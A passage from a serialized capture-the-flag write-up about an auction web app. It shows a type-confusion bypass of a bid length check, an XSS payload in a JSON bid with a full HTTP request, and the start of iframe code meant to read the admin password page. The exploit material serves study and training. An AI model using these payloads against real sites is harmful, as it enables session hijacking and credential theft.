isAuthenticated",{"type":34,"tag":315,"props":1253,"children":1254},{"style":338},[1255],{"type":39,"value":372},{"type":34,"tag":315,"props":1257,"children":1258},{"style":384},[1259],{"type":39,"value":387},{"type":34,"tag":315,"props":1261,"children":1262},{"style":338},[1263],{"type":39,"value":392},{"type":34,"tag":315,"props":1265,"children":1266},{"style":332},[1267],{"type":39,"value":397},{"type":34,"tag":315,"props":1269,"children":1270},{"style":338},[1271],{"type":39,"value":372},{"type":34,"tag":315,"props":1273,"children":1274},{"style":332},[1275],{"type":39,"value":406},{"type":34,"tag":315,"props":1277,"children":1278},{"style":338},[1279],{"type":39,"value":177},{"type":34,"tag":315,"props":1281,"children":1282},{"style":338},[1283],{"type":39,"value":415},{"type":34,"tag":315,"props":1285,"children":1286},{"style":338},[1287],{"type":39,"value":420},{"type":34,"tag":315,"props":1289,"children":1290},{"class":317,"line":328},[1291,1295],{"type":34,"tag":315,"props":1292,"children":1293},{"style":475},[1294],{"type":39,"value":478},{"type":34,"tag":315,"props":1296,"children":1297},{"style":338},[1298],{"type":39,"value":420},{"type":34,"tag":315,"props":1300,"children":1301},{"class":317,"line":423},[1302,1306,1311,1315,1319,1323,1328,1332,1337],{"type":34,"tag":315,"props":1303,"children":1304},{"style":384},[1305],{"type":39,"value":491},{"type":34,"tag":315,"props":1307,"children":1308},{"style":332},[1309],{"type":39,"value":1310}," auctionId",{"type":34,"tag":315,"props":1312,"children":1313},{"style":338},[1314],{"type":39,"value":449},{"type":34,"tag":315,"props":1316,"children":1317},{"style":332},[1318],{"type":39,"value":454},{"type":34,"tag":315,"props":1320,"children":1321},{"style":338},[1322],{"type":39,"value":66},{"type":34,"tag":315,"props":1324,"children":1325},{"style":332},[1326],{"type":39,"value":1327},"params",{"type":34,"tag":315,"props":1329,"children":1330},{"style":338},[1331],{"type":39,"value":66},{"type":34,"tag":315,"props":1333,"children":1334},{"style":332},[1335],{"type":39,"value":1336},"id",{"type":34,"tag":315,"props":1338,"children":1339},{"style":338},[1340],{"type":39,"value":468},{"type":34,"tag":315,"props":1342,"children":1343},{"class":317,"line":471},[1344,1348,1353,1357,1361,1365,1370,1374,1379],{"type":34,"tag":315,"props":1345,"children":1346},{"style":384},[1347],{"type":39,"value":491},{"type":34,"tag":315,"props":1349,"children":1350},{"style":332},[1351],{"type":39,"value":1352}," userId",{"type":34,"tag":315,"props":1354,"children":1355},{"style":338},[1356],{"type":39,"value":449},{"type":34,"tag":315,"props":1358,"children":1359},{"style":332},[1360],{"type":39,"value":454},{"type":34,"tag":315,"props":1362,"children":1363},{"style":338},[1364],{"type":39,"value":66},{"type":34,"tag":315,"props":1366,"children":1367},{"style":332},[1368],{"type":39,"value":1369},"session",{"type":34,"tag":315,"props":1371,"children":1372},{"style":338},[1373],{"type":39,"value":66},{"type":34,"tag":315,"props":1375,"children":1376},{"style":332},[1377],{"type":39,"value":1378},"userId",{"type":34,"tag":315,"props":1380,"children":1381},{"style":338},[1382],{"type":39,"value":468},{"type":34,"tag":315,"props":1384,"children":1385},{"class":317,"line":485},[1386,1390,1394,1399,1403,1407,1411,1415,1419],{"type":34,"tag":315,"props":1387,"children":1388},{"style":384},[1389],{"type":39,"value":491},{"type":34,"tag":315,"props":1391,"children":1392},{"style":338},[1393],{"type":39,"value":434},{"type":34,"tag":315,"props":1395,"children":1396},{"style":332},[1397],{"type":39,"value":1398}," bid",{"type":34,"tag":315,"props":1400,"children":1401},{"style":338},[1402],{"type":39,"value":444},{"type":34,"tag":315,"props":1404,"children":1405},{"style":338},[1406],{"type":39,"value":449},{"type":34,"tag":315,"props":1408,"children":1409},{"style":332},[1410],{"type":39,"value":454},{"type":34,"tag":315,"props":1412,"children":1413},{"style":338},[1414],{"type":39,"value":66},{"type":34,"tag":315,"props":1416,"children":1417},{"style":332},[1418],{"type":39,"value":463},{"type":34,"tag":315,"props":1420,"children":1421},{"style":338},[1422],{"type":39,"value":468},{"type":34,"tag":315,"props":1424,"children":1425},{"class":317,"line":541},[1426],{"type":34,"tag":315,"props":1427,"children":1428},{"emptyLinePlaceholder":545},[1429],{"type":39,"value":548},{"type":34,"tag":315,"props":1431,"children":1432},{"class":317,"line":551},[1433,1438,1442,1447,1451,1456,1461,1467,1471,1475],{"type":34,"tag":315,"props":1434,"children":1435},{"style":475},[1436],{"type":39,"value":1437},"    if",{"type":34,"tag":315,"props":1439,"children":1440},{"style":338},[1441],{"type":39,"value":392},{"type":34,"tag":315,"props":1443,"children":1444},{"style":332},[1445],{"type":39,"value":1446},"bid",{"type":34,"tag":315,"props":1448,"children":1449},{"style":338},[1450],{"type":39,"value":66},{"type":34,"tag":315,"props":1452,"children":1453},{"style":642},[1454],{"type":39,"value":1455},"length",{"type":34,"tag":315,"props":1457,"children":1458},{"style":338},[1459],{"type":39,"value":1460}," >",{"type":34,"tag":315,"props":1462,"children":1464},{"style":1463},"--shiki-default:#4C9A91",[1465],{"type":39,"value":1466}," 10",{"type":34,"tag":315,"props":1468,"children":1469},{"style":338},[1470],{"type":39,"value":177},{"type":34,"tag":315,"props":1472,"children":1473},{"style":338},[1474],{"type":39,"value":434},{"type":34,"tag":315,"props":1476,"children":1477},{"style":322},[1478],{"type":39,"value":1479}," // \u003C-- CHECK THE LENGTH\n",{"type":34,"tag":315,"props":1481,"children":1482},{"class":317,"line":570},[1483,1488,1492,1496,1501,1505,1510,1515,1519,1523,1527,1531,1536,1540,1545,1549,1554,1559,1563],{"type":34,"tag":315,"props":1484,"children":1485},{"style":475},[1486],{"type":39,"value":1487},"      return",{"type":34,"tag":315,"props":1489,"children":1490},{"style":332},[1491],{"type":39,"value":406},{"type":34,"tag":315,"props":1493,"children":1494},{"style":338},[1495],{"type":39,"value":66},{"type":34,"tag":315,"props":1497,"children":1498},{"style":343},[1499],{"type":39,"value":1500},"status",{"type":34,"tag":315,"props":1502,"children":1503},{"style":338},[1504],{"type":39,"value":351},{"type":34,"tag":315,"props":1506,"children":1507},{"style":1463},[1508],{"type":39,"value":1509},"400",{"type":34,"tag":315,"props":1511,"children":1512},{"style":338},[1513],{"type":39,"value":1514},").",{"type":34,"tag":315,"props":1516,"children":1517},{"style":343},[1518],{"type":39,"value":634},{"type":34,"tag":315,"props":1520,"children":1521},{"style":338},[1522],{"type":39,"value":639},{"type":34,"tag":315,"props":1524,"children":1525},{"style":642},[1526],{"type":39,"value":645},{"type":34,"tag":315,"props":1528,"children":1529},{"style":338},[1530],{"type":39,"value":650},{"type":34,"tag":315,"props":1532,"children":1533},{"style":475},[1534],{"type":39,"value":1535}," false",{"type":34,"tag":315,"props":1537,"children":1538},{"style":338},[1539],{"type":39,"value":372},{"type":34,"tag":315,"props":1541,"children":1542},{"style":642},[1543],{"type":39,"value":1544}," message",{"type":34,"tag":315,"props":1546,"children":1547},{"style":338},[1548],{"type":39,"value":650},{"type":34,"tag":315,"props":1550,"children":1551},{"style":354},[1552],{"type":39,"value":1553}," '",{"type":34,"tag":315,"props":1555,"children":1556},{"style":360},[1557],{"type":39,"value":1558},"Too long",{"type":34,"tag":315,"props":1560,"children":1561},{"style":354},[1562],{"type":39,"value":852},{"type":34,"tag":315,"props":1564,"children":1565},{"style":338},[1566],{"type":39,"value":668},{"type":34,"tag":315,"props":1568,"children":1569},{"class":317,"line":578},[1570],{"type":34,"tag":315,"props":1571,"children":1572},{"style":338},[1573],{"type":39,"value":1574},"    }\n",{"type":34,"tag":315,"props":1576,"children":1577},{"class":317,"line":619},[1578,1583,1588,1592,1597,1601,1605,1609,1613],{"type":34,"tag":315,"props":1579,"children":1580},{"style":475},[1581],{"type":39,"value":1582},"    await",{"type":34,"tag":315,"props":1584,"children":1585},{"style":343},[1586],{"type":39,"value":1587}," placeBid",{"type":34,"tag":315,"props":1589,"children":1590},{"style":338},[1591],{"type":39,"value":351},{"type":34,"tag":315,"props":1593,"children":1594},{"style":332},[1595],{"type":39,"value":1596},"auctionId",{"type":34,"tag":315,"props":1598,"children":1599},{"style":338},[1600],{"type":39,"value":372},{"type":34,"tag":315,"props":1602,"children":1603},{"style":332},[1604],{"type":39,"value":1352},{"type":34,"tag":315,"props":1606,"children":1607},{"style":338},[1608],{"type":39,"value":372},{"type":34,"tag":315,"props":1610,"children":1611},{"style":332},[1612],{"type":39,"value":1398},{"type":34,"tag":315,"props":1614,"children":1615},{"style":338},[1616],{"type":39,"value":616},{"type":34,"tag":315,"props":1618,"children":1619},{"class":317,"line":671},[1620,1625,1629,1633,1637,1641,1645,1649,1653],{"type":34,"tag":315,"props":1621,"children":1622},{"style":475},[1623],{"type":39,"value":1624},"    return",{"type":34,"tag":315,"props":1626,"children":1627},{"style":332},[1628],{"type":39,"value":406},{"type":34,"tag":315,"props":1630,"children":1631},{"style":338},[1632],{"type":39,"value":66},{"type":34,"tag":315,"props":1634,"children":1635},{"style":343},[1636],{"type":39,"value":634},{"type":34,"tag":315,"props":1638,"children":1639},{"style":338},[1640],{"type":39,"value":639},{"type":34,"tag":315,"props":1642,"children":1643},{"style":642},[1644],{"type":39,"value":645},{"type":34,"tag":315,"props":1646,"children":1647},{"style":338},[1648],{"type":39,"value":650},{"type":34,"tag":315,"props":1650,"children":1651},{"style":475},[1652],{"type":39,"value":655},{"type":34,"tag":315,"props":1654,"children":1655},{"style":338},[1656],{"type":39,"value":668},{"type":34,"tag":315,"props":1658,"children":1659},{"class":317,"line":680},[1660,1665,1670,1674,1679,1683],{"type":34,"tag":315,"props":1661,"children":1662},{"style":338},[1663],{"type":39,"value":1664},"  }",{"type":34,"tag":315,"props":1666,"children":1667},{"style":475},[1668],{"type":39,"value":1669}," catch",{"type":34,"tag":315,"props":1671,"children":1672},{"style":338},[1673],{"type":39,"value":392},{"type":34,"tag":315,"props":1675,"children":1676},{"style":332},[1677],{"type":39,"value":1678},"err",{"type":34,"tag":315,"props":1680,"children":1681},{"style":338},[1682],{"type":39,"value":177},{"type":34,"tag":315,"props":1684,"children":1685},{"style":338},[1686],{"type":39,"value":420},{"type":34,"tag":315,"props":1688,"children":1689},{"class":317,"line":697},[1690,1695,1699,1704,1708,1712,1717,1721,1725,1730],{"type":34,"tag":315,"props":1691,"children":1692},{"style":332},[1693],{"type":39,"value":1694},"    console",{"type":34,"tag":315,"props":1696,"children":1697},{"style":338},[1698],{"type":39,"value":66},{"type":34,"tag":315,"props":1700,"children":1701},{"style":343},[1702],{"type":39,"value":1703},"error",{"type":34,"tag":315,"props":1705,"children":1706},{"style":338},[1707],{"type":39,"value":351},{"type":34,"tag":315,"props":1709,"children":1710},{"style":354},[1711],{"type":39,"value":852},{"type":34,"tag":315,"props":1713,"children":1714},{"style":360},[1715],{"type":39,"value":1716},"Error placing bid:",{"type":34,"tag":315,"props":1718,"children":1719},{"style":354},[1720],{"type":39,"value":852},{"type":34,"tag":315,"props":1722,"children":1723},{"style":338},[1724],{"type":39,"value":372},{"type":34,"tag":315,"props":1726,"children":1727},{"style":332},[1728],{"type":39,"value":1729}," err",{"type":34,"tag":315,"props":1731,"children":1732},{"style":338},[1733],{"type":39,"value":616},{"type":34,"tag":315,"props":1735,"children":1736},{"class":317,"line":707},[1737,1741,1746,1750,1754,1758,1763,1767,1772,1776,1780,1785,1789,1793,1798],{"type":34,"tag":315,"props":1738,"children":1739},{"style":384},[1740],{"type":39,"value":491},{"type":34,"tag":315,"props":1742,"children":1743},{"style":332},[1744],{"type":39,"value":1745}," status",{"type":34,"tag":315,"props":1747,"children":1748},{"style":338},[1749],{"type":39,"value":449},{"type":34,"tag":315,"props":1751,"children":1752},{"style":332},[1753],{"type":39,"value":1729},{"type":34,"tag":315,"props":1755,"children":1756},{"style":338},[1757],{"type":39,"value":66},{"type":34,"tag":315,"props":1759,"children":1760},{"style":332},[1761],{"type":39,"value":1762},"message",{"type":34,"tag":315,"props":1764,"children":1765},{"style":338},[1766],{"type":39,"value":66},{"type":34,"tag":315,"props":1768,"children":1769},{"style":343},[1770],{"type":39,"value":1771},"includes",{"type":34,"tag":315,"props":1773,"children":1774},{"style":338},[1775],{"type":39,"value":351},{"type":34,"tag":315,"props":1777,"children":1778},{"style":354},[1779],{"type":39,"value":852},{"type":34,"tag":315,"props":1781,"children":1782},{"style":360},[1783],{"type":39,"value":1784},"Invalid",{"type":34,"tag":315,"props":1786,"children":1787},{"style":354},[1788],{"type":39,"value":852},{"type":34,"tag":315,"props":1790,"children":1791},{"style":338},[1792],{"type":39,"value":177},{"type":34,"tag":315,"props":1794,"children":1795},{"style":384},[1796],{"type":39,"value":1797}," ?",{"type":34,"tag":315,"props":1799,"children":1800},{"style":1463},[1801],{"type":39,"value":1802}," 400\n",{"type":34,"tag":315,"props":1804,"children":1806},{"class":317,"line":1805},15,[1807,1812,1816,1820,1824,1828,1832,1836,1840,1844,1849,1853,1857,1862,1866,1870,1874,1878,1882,1886,1890,1895,1899,1904,1908],{"type":34,"tag":315,"props":1808,"children":1809},{"style":384},[1810],{"type":39,"value":1811},"                  :",{"type":34,"tag":315,"props":1813,"children":1814},{"style":338},[1815],{"type":39,"value":392},{"type":34,"tag":315,"props":1817,"children":1818},{"style":332},[1819],{"type":39,"value":1678},{"type":34,"tag":315,"props":1821,"children":1822},{"style":338},[1823],{"type":39,"value":66},{"type":34,"tag":315,"props":1825,"children":1826},{"style":332},[1827],{"type":39,"value":1762},{"type":34,"tag":315,"props":1829,"children":1830},{"style":338},[1831],{"type":39,"value":66},{"type":34,"tag":315,"props":1833,"children":1834},{"style":343},[1835],{"type":39,"value":1771},{"type":34,"tag":315,"props":1837,"children":1838},{"style":338},[1839],{"type":39,"value":351},{"type":34,"tag":315,"props":1841,"children":1842},{"style":354},[1843],{"type":39,"value":852},{"type":34,"tag":315,"props":1845,"children":1846},{"style":360},[1847],{"type":39,"value":1848},"not found",{"type":34,"tag":315,"props":1850,"children":1851},{"style":354},[1852],{"type":39,"value":852},{"type":34,"tag":315,"props":1854,"children":1855},{"style":338},[1856],{"type":39,"value":177},{"type":34,"tag":315,"props":1858,"children":1859},{"style":384},[1860],{"type":39,"value":1861}," ||",{"type":34,"tag":315,"props":1863,"children":1864},{"style":332},[1865],{"type":39,"value":1729},{"type":34,"tag":315,"props":1867,"children":1868},{"style":338},[1869],{"type":39,"value":66},{"type":34,"tag":315,"props":1871,"children":1872},{"style":332},[1873],{"type":39,"value":1762},{"type":34,"tag":315,"props":1875,"children":1876},{"style":338},[1877],{"type":39,"value":66},{"type":34,"tag":315,"props":1879,"children":1880},{"style":343},[1881],{"type":39,"value":1771},{"type":34,"tag":315,"props":1883,"children":1884},{"style":338},[1885],{"type":39,"value":351},{"type":34,"tag":315,"props":1887,"children":1888},{"style":354},[1889],{"type":39,"value":852},{"type":34,"tag":315,"props":1891,"children":1892},{"style":360},[1893],{"type":39,"value":1894},"closed",{"type":34,"tag":315,"props":1896,"children":1897},{"style":354},[1898],{"type":39,"value":852},{"type":34,"tag":315,"props":1900,"children":1901},{"style":338},[1902],{"type":39,"value":1903},"))",{"type":34,"tag":315,"props":1905,"children":1906},{"style":384},[1907],{"type":39,"value":1797},{"type":34,"tag":315,"props":1909,"children":1910},{"style":1463},[1911],{"type":39,"value":1912}," 404\n",{"type":34,"tag":315,"props":1914,"children":1916},{"class":317,"line":1915},16,[1917,1921,1926],{"type":34,"tag":315,"props":1918,"children":1919},{"style":384},[1920],{"type":39,"value":1811},{"type":34,"tag":315,"props":1922,"children":1923},{"style":1463},[1924],{"type":39,"value":1925}," 500",{"type":34,"tag":315,"props":1927,"children":1928},{"style":338},[1929],{"type":39,"value":468},{"type":34,"tag":315,"props":1931,"children":1933},{"class":317,"line":1932},17,[1934,1938,1942,1946,1950,1954,1958,1962,1966,1970,1974,1978,1982,1986,1990,1994,1998,2002,2006,2010,2014,2019,2023],{"type":34,"tag":315,"props":1935,"children":1936},{"style":475},[1937],{"type":39,"value":1624},{"type":34,"tag":315,"props":1939,"children":1940},{"style":332},[1941],{"type":39,"value":406},{"type":34,"tag":315,"props":1943,"children":1944},{"style":338},[1945],{"type":39,"value":66},{"type":34,"tag":315,"props":1947,"children":1948},{"style":343},[1949],{"type":39,"value":1500},{"type":34,"tag":315,"props":1951,"children":1952},{"style":338},[1953],{"type":39,"value":351},{"type":34,"tag":315,"props":1955,"children":1956},{"style":332},[1957],{"type":39,"value":1500},{"type":34,"tag":315,"props":1959,"children":1960},{"style":338},[1961],{"type":39,"value":1514},{"type":34,"tag":315,"props":1963,"children":1964},{"style":343},[1965],{"type":39,"value":634},{"type":34,"tag":315,"props":1967,"children":1968},{"style":338},[1969],{"type":39,"value":639},{"type":34,"tag":315,"props":1971,"children":1972},{"style":642},[1973],{"type":39,"value":645},{"type":34,"tag":315,"props":1975,"children":1976},{"style":338},[1977],{"type":39,"value":650},{"type":34,"tag":315,"props":1979,"children":1980},{"style":475},[1981],{"type":39,"value":1535},{"type":34,"tag":315,"props":1983,"children":1984},{"style":338},[1985],{"type":39,"value":372},{"type":34,"tag":315,"props":1987,"children":1988},{"style":642},[1989],{"type":39,"value":1544},{"type":34,"tag":315,"props":1991,"children":1992},{"style":338},[1993],{"type":39,"value":650},{"type":34,"tag":315,"props":1995,"children":1996},{"style":332},[1997],{"type":39,"value":1729},{"type":34,"tag":315,"props":1999,"children":2000},{"style":338},[2001],{"type":39,"value":66},{"type":34,"tag":315,"props":2003,"children":2004},{"style":332},[2005],{"type":39,"value":1762},{"type":34,"tag":315,"props":2007,"children":2008},{"style":384},[2009],{"type":39,"value":1861},{"type":34,"tag":315,"props":2011,"children":2012},{"style":354},[2013],{"type":39,"value":1553},{"type":34,"tag":315,"props":2015,"children":2016},{"style":360},[2017],{"type":39,"value":2018},"Internal server error.",{"type":34,"tag":315,"props":2020,"children":2021},{"style":354},[2022],{"type":39,"value":852},{"type":34,"tag":315,"props":2024,"children":2025},{"style":338},[2026],{"type":39,"value":668},{"type":34,"tag":315,"props":2028,"children":2030},{"class":317,"line":2029},18,[2031],{"type":34,"tag":315,"props":2032,"children":2033},{"style":338},[2034],{"type":39,"value":677},{"type":34,"tag":315,"props":2036,"children":2038},{"class":317,"line":2037},19,[2039],{"type":34,"tag":315,"props":2040,"children":2041},{"style":338},[2042],{"type":39,"value":713},{"type":34,"tag":48,"props":2044,"children":2045},{},[2046],{"type":39,"value":2047},"However, we can see in the code that no type checking is performed. It is therefore entirely possible to submit a JSON object with a length element less than 10 to pass this check:",{"type":34,"tag":301,"props":2049,"children":2050},{"lang":634},[2051],{"type":34,"tag":306,"props":2052,"children":2055},{"className":2053,"code":2054,"language":634,"meta":7,"style":7},"language-json shiki shiki-themes vitesse-dark","{\"bid\":{\"length\":1,\"o\":\"a'>\u003Cimg src=x onerror=alert(1)>\"}}\n",[2056],{"type":34,"tag":59,"props":2057,"children":2058},{"__ignoreMap":7},[2059],{"type":34,"tag":315,"props":2060,"children":2061},{"class":317,"line":318},[2062,2067,2072,2076,2080,2085,2089,2093,2097,2101,2106,2110,2114,2119,2123,2127,2131,2136,2140],{"type":34,"tag":315,"props":2063,"children":2064},{"style":338},[2065],{"type":39,"value":2066},"{",{"type":34,"tag":315,"props":2068,"children":2070},{"style":2069},"--shiki-default:#B8A96577",[2071],{"type":39,"value":357},{"type":34,"tag":315,"props":2073,"children":2074},{"style":642},[2075],{"type":39,"value":1446},{"type":34,"tag":315,"props":2077,"children":2078},{"style":2069},[2079],{"type":39,"value":357},{"type":34,"tag":315,"props":2081,"children":2082},{"style":338},[2083],{"type":39,"value":2084},":{",{"type":34,"tag":315,"props":2086,"children":2087},{"style":2069},[2088],{"type":39,"value":357},{"type":34,"tag":315,"props":2090,"children":2091},{"style":642},[2092],{"type":39,"value":1455},{"type":34,"tag":315,"props":2094,"children":2095},{"style":2069},[2096],{"type":39,"value":357},{"type":34,"tag":315,"props":2098,"children":2099},{"style":338},[2100],{"type":39,"value":650},{"type":34,"tag":315,"props":2102,"children":2103},{"style":1463},[2104],{"type":39,"value":2105},"1",{"type":34,"tag":315,"props":2107,"children":2108},{"style":338},[2109],{"type":39,"value":372},{"type":34,"tag":315,"props":2111,"children":2112},{"style":2069},[2113],{"type":39,"value":357},{"type":34,"tag":315,"props":2115,"children":2116},{"style":642},[2117],{"type":39,"value":2118},"o",{"type":34,"tag":315,"props":2120,"children":2121},{"style":2069},[2122],{"type":39,"value":357},{"type":34,"tag":315,"props":2124,"children":2125},{"style":338},[2126],{"type":39,"value":650},{"type":34,"tag":315,"props":2128,"children":2129},{"style":354},[2130],{"type":39,"value":357},{"type":34,"tag":315,"props":2132,"children":2133},{"style":360},[2134],{"type":39,"value":2135},"a'>\u003Cimg src=x onerror=alert(1)>",{"type":34,"tag":315,"props":2137,"children":2138},{"style":354},[2139],{"type":39,"value":357},{"type":34,"tag":315,"props":2141,"children":2142},{"style":338},[2143],{"type":39,"value":2144},"}}\n",{"type":34,"tag":48,"props":2146,"children":2147},{},[2148,2150,2155],{"type":39,"value":2149},"Additionally, in the template part that contains the injection, the dump keyword will convert the object we provide to a string which will then be passed to safe. This means that we can inject a JSON object with a length of 1 and an XSS payload in the ",{"type":34,"tag":59,"props":2151,"children":2153},{"className":2152},[],[2154],{"type":39,"value":2118},{"type":39,"value":2156}," field.",{"type":34,"tag":301,"props":2158,"children":2160},{"lang":2159},"http",[2161],{"type":34,"tag":306,"props":2162,"children":2165},{"className":2163,"code":2164,"language":2159,"meta":7,"style":7},"language-http shiki shiki-themes vitesse-dark","POST /api/auctions/1/bids HTTP/1.1\nHost: localhost:1337\nContent-Type: application/json\nContent-Length: 58\nCookie: connect.sid=s%3Ax4FJPG0GiAqVrYpH8ASKbI918wBmEvWK.us61E3liqERw6yg23%2FzUcPRMpqUNW6gk3kgbTTJsK2s\n\n{\"bid\":{\"length\":1,\"o\":\"a'>\u003Cimg src=x onerror=alert(1)>\"}}\n",[2166],{"type":34,"tag":59,"props":2167,"children":2168},{"__ignoreMap":7},[2169,2197,2210,2223,2236,2249,2256],{"type":34,"tag":315,"props":2170,"children":2171},{"class":317,"line":318},[2172,2177,2182,2187,2192],{"type":34,"tag":315,"props":2173,"children":2174},{"style":475},[2175],{"type":39,"value":2176},"POST",{"type":34,"tag":315,"props":2178,"children":2179},{"style":701},[2180],{"type":39,"value":2181}," /api/auctions/1/bids ",{"type":34,"tag":315,"props":2183,"children":2184},{"style":475},[2185],{"type":39,"value":2186},"HTTP",{"type":34,"tag":315,"props":2188,"children":2189},{"style":701},[2190],{"type":39,"value":2191},"/",{"type":34,"tag":315,"props":2193,"children":2194},{"style":1463},[2195],{"type":39,"value":2196},"1.1\n",{"type":34,"tag":315,"props":2198,"children":2199},{"class":317,"line":328},[2200,2205],{"type":34,"tag":315,"props":2201,"children":2202},{"style":475},[2203],{"type":39,"value":2204},"Host:",{"type":34,"tag":315,"props":2206,"children":2207},{"style":360},[2208],{"type":39,"value":2209}," localhost:1337\n",{"type":34,"tag":315,"props":2211,"children":2212},{"class":317,"line":423},[2213,2218],{"type":34,"tag":315,"props":2214,"children":2215},{"style":475},[2216],{"type":39,"value":2217},"Content-Type:",{"type":34,"tag":315,"props":2219,"children":2220},{"style":360},[2221],{"type":39,"value":2222}," application/json\n",{"type":34,"tag":315,"props":2224,"children":2225},{"class":317,"line":471},[2226,2231],{"type":34,"tag":315,"props":2227,"children":2228},{"style":475},[2229],{"type":39,"value":2230},"Content-Length:",{"type":34,"tag":315,"props":2232,"children":2233},{"style":360},[2234],{"type":39,"value":2235}," 58\n",{"type":34,"tag":315,"props":2237,"children":2238},{"class":317,"line":485},[2239,2244],{"type":34,"tag":315,"props":2240,"children":2241},{"style":475},[2242],{"type":39,"value":2243},"Cookie:",{"type":34,"tag":315,"props":2245,"children":2246},{"style":360},[2247],{"type":39,"value":2248}," connect.sid=s%3Ax4FJPG0GiAqVrYpH8ASKbI918wBmEvWK.us61E3liqERw6yg23%2FzUcPRMpqUNW6gk3kgbTTJsK2s\n",{"type":34,"tag":315,"props":2250,"children":2251},{"class":317,"line":541},[2252],{"type":34,"tag":315,"props":2253,"children":2254},{"emptyLinePlaceholder":545},[2255],{"type":39,"value":548},{"type":34,"tag":315,"props":2257,"children":2258},{"class":317,"line":551},[2259,2263,2267,2271,2275,2279,2283,2287,2291,2295,2299,2303,2307,2311,2315,2319,2323,2327,2331],{"type":34,"tag":315,"props":2260,"children":2261},{"style":338},[2262],{"type":39,"value":2066},{"type":34,"tag":315,"props":2264,"children":2265},{"style":2069},[2266],{"type":39,"value":357},{"type":34,"tag":315,"props":2268,"children":2269},{"style":642},[2270],{"type":39,"value":1446},{"type":34,"tag":315,"props":2272,"children":2273},{"style":2069},[2274],{"type":39,"value":357},{"type":34,"tag":315,"props":2276,"children":2277},{"style":338},[2278],{"type":39,"value":2084},{"type":34,"tag":315,"props":2280,"children":2281},{"style":2069},[2282],{"type":39,"value":357},{"type":34,"tag":315,"props":2284,"children":2285},{"style":642},[2286],{"type":39,"value":1455},{"type":34,"tag":315,"props":2288,"children":2289},{"style":2069},[2290],{"type":39,"value":357},{"type":34,"tag":315,"props":2292,"children":2293},{"style":338},[2294],{"type":39,"value":650},{"type":34,"tag":315,"props":2296,"children":2297},{"style":1463},[2298],{"type":39,"value":2105},{"type":34,"tag":315,"props":2300,"children":2301},{"style":338},[2302],{"type":39,"value":372},{"type":34,"tag":315,"props":2304,"children":2305},{"style":2069},[2306],{"type":39,"value":357},{"type":34,"tag":315,"props":2308,"children":2309},{"style":642},[2310],{"type":39,"value":2118},{"type":34,"tag":315,"props":2312,"children":2313},{"style":2069},[2314],{"type":39,"value":357},{"type":34,"tag":315,"props":2316,"children":2317},{"style":338},[2318],{"type":39,"value":650},{"type":34,"tag":315,"props":2320,"children":2321},{"style":354},[2322],{"type":39,"value":357},{"type":34,"tag":315,"props":2324,"children":2325},{"style":360},[2326],{"type":39,"value":2135},{"type":34,"tag":315,"props":2328,"children":2329},{"style":354},[2330],{"type":39,"value":357},{"type":34,"tag":315,"props":2332,"children":2333},{"style":338},[2334],{"type":39,"value":2144},{"type":34,"tag":48,"props":2336,"children":2337},{},[2338],{"type":39,"value":2339},"After sending the data, if we go to the auction/1 page, we can see that our XSS is successfully triggered:",{"type":34,"tag":73,"props":2341,"children":2343},{"imgSrc":2342},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743103381/writeups/aurors-archive/xss_alert.webp",[],{"type":34,"tag":48,"props":2345,"children":2346},{},[2347],{"type":39,"value":2348},"From now on, the path is to retrieve the admin password, so we will test our XSS payload on the admin area to better calibrate our attack and be able to send a functional payload to the admin",{"type":34,"tag":48,"props":2350,"children":2351},{},[2352],{"type":39,"value":2353},"I tested several approaches, notably with fetches but none of them worked on my end. What seemed the simplest at first glance was to work with an iframe since our XSS is on the same origin as the page that displays the user table passwords, we can interact with the iframe however we want.",{"type":34,"tag":48,"props":2355,"children":2356},{},[2357],{"type":39,"value":2358},"We will therefore create an iframe that will render the /admin page:",{"type":34,"tag":301,"props":2360,"children":2361},{"lang":303},[2362],{"type":34,"tag":306,"props":2363,"children":2365},{"className":308,"code":2364,"language":303,"meta":7,"style":7},"let iframe = document.createElement(\"iframe\");\niframe.src = `/admin`;\niframe.width = 800;\niframe.height = 600;\ndocument.body.appendChild(iframe);\n",[2366],{"type":34,"tag":59,"props":2367,"children":2368},{"__ignoreMap":7},[2369,2421,2458,2487,2516],{"type":34,"tag":315,"props":2370,"children":2371},{"class":317,"line":318},[2372,2377,2382,2386,2391,2395,2400,2404,2408,2413,2417],{"type":34,"tag":315,"props":2373,"children":2374},{"style":384},[2375],{"type":39,"value":2376},"let",{"type":34,"tag":315,"props":2378,"children":2379},{"style":332},[2380],{"type":39,"value":2381}," iframe",{"type":34,"tag":315,"props":2383,"children":2384},{"style":338},[2385],{"type":39,"value":449},{"type":34,"tag":315,"props":2387,"children":2388},{"style":332},[2389],{"type":39,"value":2390}," document",{"type":34,"tag":315,"props":2392,"children":2393},{"style":338},[2394],{"type":39,"value":66},{"type":34,"tag":315,"props":2396,"children":2397},{"style":343},[2398],{"type":39,"value":2399},"createElement",{"type":34,"tag":315,"props":2401,"children":2402},{"style":338},[2403],{"type":39,"value":351},{"type":34,"tag":315,"props":2405,"children":2406},{"style":354},[2407],{"type":39,"value":357},{"type":34,"tag":315,"props":2409,"children":2410},{"style":360},[2411],{"type":39,"value":2412},"iframe",{"type":34,"tag":315,"props":2414,"children":2415},{"style":354},[2416],{"type":39,"value":357},{"type":34,"tag":315,"props":2418,"children":2419},{"style":338},[2420],{"type":39,"value":616},{"type":34,"tag":315,"props":2422,"children":2423},{"class":317,"line":328},[2424,2428,2432,2437,2441,2445,2450,2454],{"type":34,"tag":315,"props":2425,"children":2426},{"style":332},[2427],{"type":39,"value":2412},{"type":34,"tag":315,"props":2429,"children":2430},{"style":338},[2431],{"type":39,"value":66},{"type":34,"tag":315,"props":2433,"children":2434},{"style":332},[2435],{"type":39,"value":2436},"src",{"type":34,"tag":315,"props":2438,"children":2439},{"style":338},[2440],{"type":39,"value":449},{"type":34,"tag":315,"props":2442,"children":2443},{"style":354},[2444],{"type":39,"value":505},{"type":34,"tag":315,"props":2446,"children":2447},{"style":360},[2448],{"type":39,"value":2449},"/admin",{"type":34,"tag":315,"props":2451,"children":2452},{"style":354},[2453],{"type":39,"value":534},{"type":34,"tag":315,"props":2455,"children":2456},{"style":338},[2457],{"type":39,"value":468},{"type":34,"tag":315,"props":2459,"children":2460},{"class":317,"line":423},[2461,2465,2469,2474,2478,2483],{"type":34,"tag":315,"props":2462,"children":2463},{"style":332},[2464],{"type":39,"value":2412},{"type":34,"tag":315,"props":2466,"children":2467},{"style":338},[2468],{"type":39,"value":66},{"type":34,"tag":315,"props":2470,"children":2471},{"style":332},[2472],{"type":39,"value":2473},"width",{"type":34,"tag":315,"props":2475,"children":2476},{"